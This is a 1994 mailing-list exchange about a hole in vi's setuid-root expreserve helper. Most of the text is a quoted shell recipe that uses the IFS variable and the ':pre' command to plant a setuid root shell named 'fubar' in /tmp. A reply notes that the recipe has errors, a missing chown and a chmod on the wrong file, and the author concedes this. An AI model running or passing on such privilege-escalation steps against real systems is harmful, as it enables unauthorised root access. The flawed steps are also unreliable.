On Sun, 16 Oct 1994, Chris Ellwood wrote: > Charles Howes said... > > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some > > versions). Expreserve is setuid root. Expreserve runs /bin/mail > > with 'system()'. So, do the following: > > % cd /tmp > > % cp /bin/sh fubar > > % cat > bin > > chmod 4755 fubar > > ^D > > % chmod u+x fubar > > I see a couple problems with the script so far. /bin/sh was copied > to fubar while you are a regular user, so it will be owned by you > and you'll end up with a nice copy of /bin/sh that's setuid to you, > not your target user. Also, that last line should probably read > 'chmod u+x bin', not fubar. Ooops, forgot the chown. Sigh. Trust memory to lose things. > > % setenv IFS=/ > > % vi > > :pre > > :q > > % fubar > > # > > Some versions of expreserve don't have the hole. > > Some versions of vi don't have the :pre command. > > One does not imply the other. > > Thanks for posting it anyway. > > - Chris > -- Charles Howes -- chowes@helix.net Always tell the truth, then you make it the other bloke's problem! - Sean Connery, 1971